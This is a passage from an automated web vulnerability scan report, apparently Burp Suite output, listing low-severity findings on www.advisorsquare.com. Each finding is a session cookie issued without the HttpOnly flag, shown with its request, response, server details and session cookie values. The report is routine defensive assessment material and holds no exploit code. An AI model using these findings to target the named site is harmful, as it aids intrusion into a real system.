GET /design_gallery/Flash/CS20_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=PMPGGKOBOGMJMEOABEODHBKP; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:27:49 GMT

18.36. http://www.advisorsquare.com/design_gallery/Flash/GA14_bg.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/Flash/GA14_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design_gallery/Flash/GA14_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=INPGGKOBEMCOOEGKALONCHAP; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:27:56 GMT

18.37. http://www.advisorsquare.com/design_gallery/Flash/GA15_bg.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/Flash/GA15_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design_gallery/Flash/GA15_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=LNPGGKOBDENCNKKNAIHEPCLM; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:27:58 GMT

18.38. http://www.advisorsquare.com/design_gallery/Flash/NL12_bg.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/Flash/NL12_bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design_gallery/Flash/NL12_bg.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=KPPGGKOBGNGDAMBMBMPNJNIO; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:28:18 GMT

18.39. http://www.advisorsquare.com/design_gallery/fsplash/background.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/fsplash/background.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design_gallery/fsplash/background.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=ELPGGKOBCBJHNDIFJAFOCPEJ; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:27:20 GMT

18.40. http://www.advisorsquare.com/design_gallery/limited/SE3_background.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/limited/SE3_background.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design_gallery/limited/SE3_background.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=PDPGGKOBFDFEBAKPFPLHNIIM; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:14 GMT

18.41. http://www.advisorsquare.com/design_gallery/welcome/grayStripe.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/welcome/grayStripe.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design_gallery/welcome/grayStripe.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=EDPGGKOBFCPEJGENCNPMAKBO; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:03 GMT

18.42. http://www.advisorsquare.com/design_gallery/welcome/transpx.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /design_gallery/welcome/transpx.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design_gallery/welcome/transpx.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=PCPGGKOBNFHEDDHNOCEMJDFJ; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:02 GMT

18.43. http://www.advisorsquare.com/images/business.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /images/business.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/business.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=CJPGGKOBPCNHDODMEFKBJGPO; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:56 GMT

18.44. http://www.advisorsquare.com/images/business_over.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /images/business_over.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/business_over.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=EJPGGKOBAGIHNJPHDNENBHON; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:56 GMT

18.45. http://www.advisorsquare.com/images/individual.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /images/individual.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/individual.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=PIPGGKOBKLIPCLIEHBLLCNIL; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:55 GMT

18.46. http://www.advisorsquare.com/images/individual_over.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /images/individual_over.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/individual_over.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=AJPGGKOBNHKLBHKHLECCMMJP; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:55 GMT

18.47. http://www.advisorsquare.com/images/view1.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /images/view1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/view1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=NIPGGKOBAEOFLACMCHLMFMMI; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:55 GMT

18.48. http://www.advisorsquare.com/images/view_over1.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /images/view_over1.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /images/view_over1.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=OIPGGKOBCPBLMCALFBLKFJAK; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:55 GMT

18.49. http://www.advisorsquare.com/new/BrochureLevel/transPx.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/BrochureLevel/transPx.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/BrochureLevel/transPx.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=IGPGGKOBPELIOFALKKOGHJPB; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:44 GMT

18.50. http://www.advisorsquare.com/new/BusinessLevel/FA09BannerBG.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/BusinessLevel/FA09BannerBG.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/BusinessLevel/FA09BannerBG.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=JIPGGKOBOAKMLGBJCJKACANP; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:54 GMT

18.51. http://www.advisorsquare.com/new/BusinessLevel/grayStripe.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/BusinessLevel/grayStripe.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/BusinessLevel/grayStripe.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=AKPGGKOBJDHBIFMANOCIEFNJ; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:59 GMT

18.52. http://www.advisorsquare.com/new/BusinessLevel/transPx.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/BusinessLevel/transPx.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/BusinessLevel/transPx.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=OJPGGKOBBNHAJOIAFIDBPKEN; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:58 GMT

18.53. http://www.advisorsquare.com/new/asframeless02/content.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asframeless02/content.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/asframeless02/content.asp?contentid=2016551940 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4006
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=PEPGGKOBHIEHNDFHNNDECDJH; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:26:29 GMT

<html>
<head>
<link rel="STYLESHEET" type="text/css" href="/new/asframeless02/content.asp?contentid=2016552783">
<meta name="robots" content="NOINDEX,NOFOLLOW">
<meta http-equiv="Content-Type" con
...[SNIP]...
18.54. http://www.advisorsquare.com/new/asle04/content.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle04/content.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/asle04/content.asp?contentid=2016389142 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2981
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=FPFHGKOBCFMHNMBEAFPLPFAC; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:47:39 GMT

<HTML>
<head>
<link href="content.asp?contentid=2016389142" rel="stylesheet" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<BODY TOPMARGIN=0 LE
...[SNIP]...
18.55. http://www.advisorsquare.com/new/asle04/grayStripe.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle04/grayStripe.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/asle04/grayStripe.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=MDAHGKOBOBEEKGMLGKPNGLCB; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:29:14 GMT

18.56. http://www.advisorsquare.com/new/asle04/staff_pict1.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle04/staff_pict1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/asle04/staff_pict1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=KDAHGKOBHMIKAPFJPOBEPDHK; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:29:14 GMT

18.57. http://www.advisorsquare.com/new/asle04/staff_pict2.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle04/staff_pict2.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/asle04/staff_pict2.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=LDAHGKOBMKNEKBNNHHNJGEGO; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:29:14 GMT

18.58. http://www.advisorsquare.com/new/asle05/content.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle05/content.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/asle05/content.asp?contentid=2016654382 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 7824
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=BAHHGKOBKBCFJNFLLADEPNPM; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:48:06 GMT

<HTML>
<HEAD>
<LINK href="/new/asle05/content.asp?contentid=2016654382" rel="stylesheet" type="text/css">
<META http-equiv="Content-Type" content="text/html; charset=ISO-8859-0">
</HEAD>

<BODY>
...[SNIP]...
18.59. http://www.advisorsquare.com/new/asle05/transPx.gif  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/asle05/transPx.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/asle05/transPx.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=HBAHGKOBBLMGLIDFFHHACIKA; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:28:44 GMT

18.60. http://www.advisorsquare.com/new/css/menu.css  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/css/menu.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/css/menu.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.advisorsquare.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDQABRSTCR=CBPGGKOBFJNCFCKHAHNHPDCL; path=/
X-Powered-By: ASP.NET
Date: Sat, 07 May 2011 01:25:30 GMT

18.61. http://www.advisorsquare.com/new/images/banner_slogan1.jpg  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.advisorsquare.com
Path:   /new/images/banner_slogan1.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /new/images/banner_slogan1.jpg HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
